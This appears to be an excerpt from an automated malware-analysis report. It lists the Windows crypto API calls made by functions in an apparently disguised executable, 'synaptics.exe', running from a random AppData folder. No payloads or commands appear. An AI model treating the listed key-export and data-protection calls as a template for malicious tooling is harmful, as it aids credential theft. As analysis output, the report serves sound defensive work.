                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6ABA0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyEval_SaveThread,CryptDecryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,??1PyWinBufferView@@QAE@XZ,24_2_6BF6ABA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64790 ??0PyCRYPTMSG@@QAE@PAX@Z,_Py_NewReference,PyLong_FromVoidPtr,24_2_6BF64790
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF65390 ?PyCryptImportKey@PyCRYPTPROV@@SAPAU_object@@PAU2@00@Z,_Py_NoneStruct,_PyArg_ParseTupleAndKeywords_SizeT,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,??1PyWinBufferView@@QAE@XZ,CryptImportKey,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,??1PyWinBufferView@@QAE@XZ,??0PyCRYPTKEY@@QAE@KPAU_object@@@Z,??1PyWinBufferView@@QAE@XZ,24_2_6BF65390
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF65F70 PyTuple_New,?PyWinObject_FromHANDLE@@YAPAU_object@@PAX@Z,?PyCRYPTPROVType@@3U_typeobject@@A,PyBool_FromLong,?PyWinObject_FromSECURITY_DESCRIPTOR@@YAPAU_object@@PAX@Z,PyBytes_FromString,PyExc_RuntimeWarning,PyExc_RuntimeWarning,PyErr_WarnEx,PyBytes_FromStringAndSize,_Py_BuildValue_SizeT,_Py_BuildValue_SizeT,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,24_2_6BF65F70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63B60 ?PyCryptGetHashParam@PyCRYPTHASH@@SAPAU_object@@PAU2@00@Z,PyArg_ParseTupleAndKeywords,CryptGetHashParam,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,CryptGetHashParam,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,free,PyExc_NotImplementedError,PyExc_NotImplementedError,PyErr_Format,free,PyBytes_FromStringAndSize,PyLong_FromUnsignedLong,free,24_2_6BF63B60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63760 ?PyCryptHashData@PyCRYPTHASH@@SAPAU_object@@PAU2@00@Z,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,CryptHashData,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,??1PyWinBufferView@@QAE@XZ,24_2_6BF63760
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64750 CryptMsgClose,_Py_Dealloc,24_2_6BF64750
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF69F40 PyArg_ParseTupleAndKeywords,PyList_New,PyEval_SaveThread,CryptEnumOIDInfo,PyEval_RestoreThread,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,24_2_6BF69F40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF68B3D CryptGetDefaultProviderW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptGetDefaultProviderW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,free,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z,free,24_2_6BF68B3D
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6CB10 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyExc_ValueError,PyExc_ValueError,PyErr_SetString,??1PyWinBufferView@@QAE@XZ,PyEval_SaveThread,CryptFormatObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptFormatObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,free,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z,free,24_2_6BF6CB10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64710 ?deallocFunc@PyCRYPTMSG@@SAXPAU_object@@@Z,CryptMsgClose,_Py_Dealloc,24_2_6BF64710
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF686F0 PyList_New,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,malloc,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,Py_BuildValue,PyList_Append,_Py_Dealloc,free,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_Dealloc,free,GetLastError,free,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,24_2_6BF686F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF646E0 ??1PyCRYPTMSG@@QAE@XZ,CryptMsgClose,_Py_Dealloc,24_2_6BF646E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63EC0 ?PyCryptExportKey@PyCRYPTKEY@@SAPAU_object@@PAU2@00@Z,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,CryptExportKey,CryptExportKey,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,CryptExportKey,PyBytes_FromStringAndSize,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,free,24_2_6BF63EC0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF636C0 ?PyCryptDuplicateHash@PyCRYPTHASH@@SAPAU_object@@PAU2@00@Z,PyArg_ParseTupleAndKeywords,CryptDuplicateHash,_Py_NewReference,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,24_2_6BF636C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6B6C0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,free,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyEval_SaveThread,CryptVerifyDetachedMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,free,free,free,free,??1PyWinBufferView@@QAE@XZ,free,24_2_6BF6B6C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6D2B0 PyInit_win32crypt,?PyWinGlobals_Ensure@@YAHXZ,PyModule_Create2,PyModule_GetDict,PyType_Ready,?PyCRYPTPROVType@@3U_typeobject@@A,PyType_Ready,?PyCRYPTKEYType@@3U_typeobject@@A,PyType_Ready,?PyCRYPTHASHType@@3U_typeobject@@A,PyType_Ready,?PyCRYPTMSGType@@3U_typeobject@@A,PyType_Ready,?PyCERTSTOREType@@3U_typeobject@@A,PyType_Ready,?PyCERT_CONTEXTType@@3U_typeobject@@A,PyType_Ready,?PyCTL_CONTEXTType@@3U_typeobject@@A,PyType_Ready,PyTuple_New,24_2_6BF6D2B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF652A0 ?PyCryptCreateHash@PyCRYPTPROV@@SAPAU_object@@PAU2@00@Z,_Py_NoneStruct,_PyArg_ParseTupleAndKeywords_SizeT,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,CryptCreateHash,_Py_NewReference,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,24_2_6BF652A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63690 ?PyCryptDestroyHash@PyCRYPTHASH@@SAPAU_object@@PAU2@0@Z,CryptDestroyHash,_Py_NoneStruct,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,24_2_6BF63690
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63E90 ?PyCryptDestroyKey@PyCRYPTKEY@@SAPAU_object@@PAU2@0@Z,CryptDestroyKey,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_NoneStruct,_Py_NoneStruct,24_2_6BF63E90
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6B290 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,??1PyWinBufferView@@QAE@XZ,PyEval_SaveThread,CryptGetMessageCertificates,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_NewReference,PyLong_FromVoidPtr,24_2_6BF6B290
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64A80 ?PyCryptGetProvParam@PyCRYPTPROV@@SAPAU_object@@PAU2@00@Z,_PyArg_ParseTupleAndKeywords_SizeT,CryptGetProvParam,PyBool_FromLong,CryptGetProvParam,CryptGetProvParam,GetLastError,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,PyList_New,CryptGetProvParam,_Py_Dealloc,?PyWinCoreString_FromString@@YAPAU_object@@PBDH@Z,PyList_Append,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyList_New,CryptGetProvParam,_Py_Dealloc,PyList_Append,?PyWinCoreString_FromString@@YAPAU_object@@PBDH@Z,_Py_BuildValue_SizeT,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyList_New,CryptGetProvParam,_Py_Dealloc,PyList_Append,?PyWinCoreString_FromString@@YAPAU_object@@PBDH@Z,_Py_BuildValue_SizeT,CryptGetProvParam,CryptGetProvParam,malloc,CryptGetProvParam,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromSECURITY_DESCRIPTOR@@YAPAU_object@@PAX@Z,_Py_BuildValue_SizeT,PyBytes_FromString,PyExc_NotImplementedError,PyExc_NotImplementedError,PyErr_SetString,free,24_2_6BF64A80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6BE70 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyExc_NotImplementedError,PyExc_NotImplementedError,PyErr_SetString,??1PyWinBufferView@@QAE@XZ,PyEval_SaveThread,CryptDecodeObjectEx,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyTuple_New,PyBytes_FromStringAndSize,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z,_Py_BuildValue_SizeT,PyBytes_FromString,_Py_BuildValue_SizeT,_Py_BuildValue_SizeT,_Py_BuildValue_SizeT,_Py_BuildValue_SizeT,PyExc_NotImplementedError,PyExc_NotImplementedError,PyErr_Format,PyBytes_FromStringAndSize,_Py_NoneStruct,_Py_NoneStruct,PyBytes_FromStringAndSize,PyBytes_FromStringAndSize,_Py_BuildValue_SizeT,_Py_NoneStruct,PyBytes_FromStringAndSize,_Py_BuildValue_SizeT,?PyWinObject_FromFILETIME@@YAPAU_object@@ABU_FILETIME@@@Z,?PyWinObject_FromFILETIME@@YAPAU_object@@ABU_FILETIME@@@Z,?PyWinObject_FromFILETIME@@YAPAU_object@@ABU_FILETIME@@@Z,_Py_BuildValue_SizeT,PyTuple_New,PyBytes_FromStringAndSize,PyBytes_FromStringAndSize,_Py_BuildValue_SizeT,_Py_BuildValue_SizeT,PyBool_FromLong,_Py_BuildValue_SizeT,_Py_Dealloc,PyBool_FromLong,PyBool_FromLong,PyBool_FromLong,_Py_BuildValue_SizeT,PyTuple_New,PyTuple_New,PyTuple_New,PyBytes_FromStringAndSize,_Py_BuildValue_SizeT,_Py_BuildValue_SizeT,PyTuple_New,_Py_Dealloc,_Py_Dealloc,PyBytes_FromStringAndSize,PyBytes_FromStringAndSize,PyBytes_FromStringAndSize,PyBytes_FromStringAndSize,PyExc_NotImplementedError,PyExc_NotImplementedError,PyErr_SetString,PyTuple_New,_Py_BuildValue_SizeT,LocalFree,24_2_6BF6BE70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF62A60 ?PyCryptAcquireCertificatePrivateKey@PyCERT_CONTEXT@@SAPAU_object@@PAU2@00@Z,PyExc_ValueError,PyExc_ValueError,PyErr_SetString,PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptAcquireCertificatePrivateKey,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,CryptContextAddRef,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_NewReference,Py_BuildValue,24_2_6BF62A60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63660 ??0PyCRYPTHASH@@QAE@K@Z,_Py_NewReference,24_2_6BF63660
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63E50 ??0PyCRYPTKEY@@QAE@KPAU_object@@@Z,_Py_NewReference,PyLong_FromVoidPtr,24_2_6BF63E50
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64250 ?PyCryptEncrypt@PyCRYPTKEY@@SAPAU_object@@PAU2@00@Z,_Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,??1PyWinBufferView@@QAE@XZ,CryptEncrypt,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,??1PyWinBufferView@@QAE@XZ,malloc,PyErr_NoMemory,??1PyWinBufferView@@QAE@XZ,memcpy,CryptEncrypt,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize,free,??1PyWinBufferView@@QAE@XZ,24_2_6BF64250
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6A250 PyArg_ParseTupleAndKeywords,PyExc_ValueError,PyExc_ValueError,PyErr_Format,?init@PyWinBufferView@@QAE_NPAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyEval_SaveThread,CryptQueryObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyLong_FromVoidPtr,_Py_NewReference,_Py_NewReference,PyLong_FromVoidPtr,PyLong_FromVoidPtr,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyLong_FromVoidPtr,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyLong_FromVoidPtr,_Py_NoneStruct,Py_BuildValue,??1PyWinBufferView@@QAE@XZ,PyMem_Free,24_2_6BF6A250
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63640 CryptDestroyHash,24_2_6BF63640
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63620 ?deallocFunc@PyCRYPTHASH@@SAXPAU_object@@@Z,CryptDestroyHash,24_2_6BF63620
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63A10 ?PyCryptVerifySignature@PyCRYPTHASH@@SAPAU_object@@PAU2@00@Z,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,??1PyWinBufferView@@QAE@XZ,CryptVerifySignatureW,_Py_NoneStruct,_Py_NoneStruct,??1PyWinBufferView@@QAE@XZ,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,??1PyWinBufferView@@QAE@XZ,24_2_6BF63A10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63610 ??1PyCRYPTHASH@@QAE@XZ,CryptDestroyHash,24_2_6BF63610
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF65610 ?PyCryptImportPublicKeyInfo@PyCRYPTPROV@@SAPAU_object@@PAU2@00@Z,_PyArg_ParseTupleAndKeywords_SizeT,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,_PyArg_ParseTupleAndKeywords_SizeT,CryptImportPublicKeyInfo,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,??0PyCRYPTKEY@@QAE@KPAU_object@@@Z,24_2_6BF65610
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63E00 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey,24_2_6BF63E00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF699D0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyEval_SaveThread,CryptGetKeyIdentifierProperty,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyExc_NotImplementedError,PyExc_NotImplementedError,PyErr_SetString,LocalFree,??1PyWinBufferView@@QAE@XZ,PyMem_Free,24_2_6BF699D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF685C0 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyEval_SaveThread,CryptAcquireContextW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,24_2_6BF685C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63DB0 ?deallocFunc@PyCRYPTKEY@@SAXPAU_object@@@Z,_Py_Dealloc,_Py_Dealloc,CryptDestroyKey,24_2_6BF63DB0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF649A0 ?PyCryptGenKey@PyCRYPTPROV@@SAPAU_object@@PAU2@00@Z,_PyArg_ParseTupleAndKeywords_SizeT,CryptGenKey,_Py_NewReference,PyLong_FromVoidPtr,GetLastError,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,24_2_6BF649A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF651A0 ?PyCryptGenRandom@PyCRYPTPROV@@SAPAU_object@@PAU2@00@Z,_PyArg_ParseTupleAndKeywords_SizeT,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,memset,memcpy,CryptGenRandom,PyBytes_FromStringAndSize,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,free,24_2_6BF651A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6AD90 memset,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyEval_SaveThread,CryptSignAndEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptSignAndEncryptMessage,PyEval_RestoreThread,PyBytes_FromStringAndSize,free,CertFreeCTLContext,free,free,??1PyWinBufferView@@QAE@XZ,24_2_6BF6AD90
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64180 ?PyCryptDuplicateKey@PyCRYPTKEY@@SAPAU_object@@PAU2@00@Z,PyArg_ParseTupleAndKeywords,CryptDuplicateKey,_Py_NewReference,PyLong_FromVoidPtr,GetLastError,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,24_2_6BF64180
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6A980 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyEval_SaveThread,CryptEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize,free,CertFreeCTLContext,free,free,??1PyWinBufferView@@QAE@XZ,24_2_6BF6A980
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63D70 ??1PyCRYPTKEY@@QAE@XZ,_Py_Dealloc,_Py_Dealloc,CryptDestroyKey,24_2_6BF63D70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6A570 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyEval_SaveThread,CryptDecodeMessage,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,??1PyWinBufferView@@QAE@XZ,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,Py_BuildValue,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecodeMessage,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,PyBytes_FromStringAndSize,Py_BuildValue,free,CertFreeCTLContext,CertFreeCTLContext,CertFreeCTLContext,24_2_6BF6A570
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF61160 ??4PyCRYPTMSG@@QAEAAV0@ABV0@@Z,24_2_6BF61160
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6D150 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyEval_SaveThread,CryptStringToBinaryW,PyEval_RestoreThread,PyBytes_FromStringAndSize,PyEval_SaveThread,CryptStringToBinaryW,PyEval_RestoreThread,_Py_Dealloc,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,Py_BuildValue,PyMem_Free,24_2_6BF6D150
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF61150 ?GetHCRYPTMSG@PyCRYPTMSG@@QAEPAXXZ,24_2_6BF61150
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64930 ?PyCryptReleaseContext@PyCRYPTPROV@@SAPAU_object@@PAU2@00@Z,_PyArg_ParseTupleAndKeywords_SizeT,CryptReleaseContext,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,24_2_6BF64930
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF61130 ??4PyCRYPTPROV@@QAEAAV0@ABV0@@Z,24_2_6BF61130
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF61120 ?GetHCRYPTPROV@PyCRYPTPROV@@QAEKXZ,24_2_6BF61120
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF68120 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,_Py_NoneStruct,_Py_NoneStruct,PyEval_SaveThread,CryptProtectData,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,PyBytes_FromStringAndSize,LocalFree,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,PyMem_Free,24_2_6BF68120
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF69D10 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,?init@PyWinBufferView@@QAE_NPAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyList_New,PyEval_SaveThread,CryptEnumKeyIdentifierProperties,PyEval_RestoreThread,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,??1PyWinBufferView@@QAE@XZ,PyMem_Free,24_2_6BF69D10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF68D10 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyEval_SaveThread,CryptFindLocalizedName,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,24_2_6BF68D10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF61100 ??4PyCRYPTKEY@@QAEAAV0@ABV0@@Z,24_2_6BF61100
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63900 ?PyCryptSignHash@PyCRYPTHASH@@SAPAU_object@@PAU2@00@Z,PyArg_ParseTupleAndKeywords,CryptSignHashW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,GetLastError,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,CryptSignHashW,GetLastError,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize,free,24_2_6BF63900
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF65500 ?PyCryptExportPublicKeyInfo@PyCRYPTPROV@@SAPAU_object@@PAU2@00@Z,_PyArg_ParseTupleAndKeywords_SizeT,CryptExportPublicKeyInfo,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,CryptExportPublicKeyInfo,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,free,free,24_2_6BF65500
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF610F0 ?GetHCRYPTKEY@PyCRYPTKEY@@QAEKXZ,24_2_6BF610F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF650E0 ?PyCryptGetUserKey@PyCRYPTPROV@@SAPAU_object@@PAU2@00@Z,_PyArg_ParseTupleAndKeywords_SizeT,CryptGetUserKey,_Py_NewReference,PyLong_FromVoidPtr,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,24_2_6BF650E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF688E0 PyList_New,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,malloc,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,Py_BuildValue,PyList_Append,_Py_Dealloc,free,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_Dealloc,free,GetLastError,free,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,24_2_6BF688E0
